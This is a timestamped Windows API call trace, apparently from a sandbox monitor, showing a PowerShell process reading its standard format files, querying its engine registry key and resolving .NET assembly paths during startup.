[0079.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
[0079.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
[0079.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0079.214] SetErrorMode (uMode=0x1) returned 0x1
[0079.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
[0079.214] SetErrorMode (uMode=0x1) returned 0x1
[0079.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0079.214] SetErrorMode (uMode=0x1) returned 0x1
[0079.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
[0079.214] SetErrorMode (uMode=0x1) returned 0x1
[0079.214] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0079.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.214] CoTaskMemFree (pv=0x2c78a0)
[0079.238] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0079.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.238] CoTaskMemFree (pv=0x2c78a0)
[0079.238] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0079.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.239] CoTaskMemFree (pv=0x2c78a0)
[0079.239] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0079.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.239] CoTaskMemFree (pv=0x2c78a0)
[0079.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.239] SetErrorMode (uMode=0x1) returned 0x1
[0079.239] SetErrorMode (uMode=0x1) returned 0x1
[0079.239] GetFileType (hFile=0x304) returned 0x1
[0079.239] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.254] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.255] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.255] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.255] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.255] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.255] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x9e2, lpOverlapped=0x0) returned 1
[0079.255] ReadFile (in: hFile=0x304, lpBuffer=0x32bbaea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bbaea*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.255] ReadFile (in: hFile=0x304, lpBuffer=0x32bc5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32bc5a0*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.255] CloseHandle (hObject=0x304) returned 1
[0079.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.258] SetErrorMode (uMode=0x1) returned 0x1
[0079.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
[0079.258] SetErrorMode (uMode=0x1) returned 0x1
[0079.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.258] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0079.258] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0079.259] CoTaskMemAlloc (cb=0x5a) returned 0x2fd3e0
[0079.259] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x2fd3e0, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0079.259] CoTaskMemFree (pv=0x2fd3e0)
[0079.259] RegCloseKey (hKey=0x304) returned 0x0
[0079.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.344] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xcdacefdb, Data2=0x137b, Data3=0x4845, Data4=([0]=0x9f, [1]=0x23, [2]=0xf1, [3]=0x59, [4]=0x6d, [5]=0x82, [6]=0xd3, [7]=0xce))) returned 0x0
[0079.380] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x72de7e7c, Data2=0xe75a, Data3=0x4445, Data4=([0]=0xbb, [1]=0x6, [2]=0xa8, [3]=0x88, [4]=0x9a, [5]=0x4a, [6]=0xf2, [7]=0xab))) returned 0x0
[0079.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.381] SetErrorMode (uMode=0x1) returned 0x1
[0079.382] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
[0079.382] GetFileType (hFile=0x304) returned 0x1
[0079.382] SetErrorMode (uMode=0x1) returned 0x1
[0079.382] GetFileType (hFile=0x304) returned 0x1
[0079.382] ReadFile (in: hFile=0x304, lpBuffer=0x32e7108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e7108*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.382] ReadFile (in: hFile=0x304, lpBuffer=0x32e7108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e7108*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.382] ReadFile (in: hFile=0x304, lpBuffer=0x32e7108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e7108*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.383] ReadFile (in: hFile=0x304, lpBuffer=0x32e7108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e7108*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.383] ReadFile (in: hFile=0x304, lpBuffer=0x32e7108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e7108*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.383] ReadFile (in: hFile=0x304, lpBuffer=0x32e7108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e7108*, lpNumberOfBytesRead=0xccd78*=0xfb2, lpOverlapped=0x0) returned 1
[0079.383] ReadFile (in: hFile=0x304, lpBuffer=0x32e6822, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e6822*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.383] ReadFile (in: hFile=0x304, lpBuffer=0x32e7108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x32e7108*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.383] CloseHandle (hObject=0x304) returned 1
[0079.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.384] SetErrorMode (uMode=0x1) returned 0x1
[0079.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
[0079.384] SetErrorMode (uMode=0x1) returned 0x1
[0079.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.384] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0079.384] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0079.384] CoTaskMemAlloc (cb=0x5a) returned 0x301eb0
[0079.384] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301eb0, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0079.384] CoTaskMemFree (pv=0x301eb0)
[0079.384] RegCloseKey (hKey=0x304) returned 0x0
[0079.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.385] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xe2b49acb, Data2=0xb481, Data3=0x409a, Data4=([0]=0x87, [1]=0xb6, [2]=0xbd, [3]=0x6b, [4]=0x78, [5]=0xd3, [6]=0x9, [7]=0x2b))) returned 0x0
[0079.386] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xbe52b066, Data2=0xf357, Data3=0x4f8d, Data4=([0]=0x83, [1]=0x4f, [2]=0xc2, [3]=0xec, [4]=0x41, [5]=0xf7, [6]=0xfa, [7]=0xa4))) returned 0x0
[0079.416] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x94a6452, Data2=0x7652, Data3=0x44bd, Data4=([0]=0xa1, [1]=0x94, [2]=0xb, [3]=0x8e, [4]=0x2b, [5]=0xee, [6]=0xa6, [7]=0xca))) returned 0x0
[0079.416] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x867684d3, Data2=0x36d9, Data3=0x4a29, Data4=([0]=0x99, [1]=0x94, [2]=0xa5, [3]=0x23, [4]=0xc, [5]=0xa0, [6]=0xbe, [7]=0x84))) returned 0x0
[0079.416] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xa205ebb5, Data2=0x3fd5, Data3=0x4d4f, Data4=([0]=0x88, [1]=0x93, [2]=0xd2, [3]=0x31, [4]=0x8e, [5]=0x2f, [6]=0xd7, [7]=0x67))) returned 0x0
[0079.416] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x1ceae70c, Data2=0x3444, Data3=0x4cab, Data4=([0]=0xac, [1]=0x99, [2]=0x5, [3]=0x6f, [4]=0x2, [5]=0x5f, [6]=0x58, [7]=0x30))) returned 0x0
[0079.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.417] SetErrorMode (uMode=0x1) returned 0x1
[0079.417] SetErrorMode (uMode=0x1) returned 0x1
[0079.417] GetFileType (hFile=0x304) returned 0x1
[0079.417] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.432] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.552] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.552] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.552] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.552] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.552] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0xaca, lpOverlapped=0x0) returned 1
[0079.553] ReadFile (in: hFile=0x304, lpBuffer=0x333249a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x333249a*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.553] ReadFile (in: hFile=0x304, lpBuffer=0x3332e68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3332e68*, lpNumberOfBytesRead=0xccd78*=0x0, lpOverlapped=0x0) returned 1
[0079.553] CloseHandle (hObject=0x304) returned 1
[0079.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.553] SetErrorMode (uMode=0x1) returned 0x1
[0079.553] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
[0079.553] SetErrorMode (uMode=0x1) returned 0x1
[0079.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.553] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0079.553] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0079.553] CoTaskMemAlloc (cb=0x5a) returned 0x301eb0
[0079.553] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301eb0, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0079.553] CoTaskMemFree (pv=0x301eb0)
[0079.553] RegCloseKey (hKey=0x304) returned 0x0
[0079.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
[0079.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0079.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
[0079.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0079.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
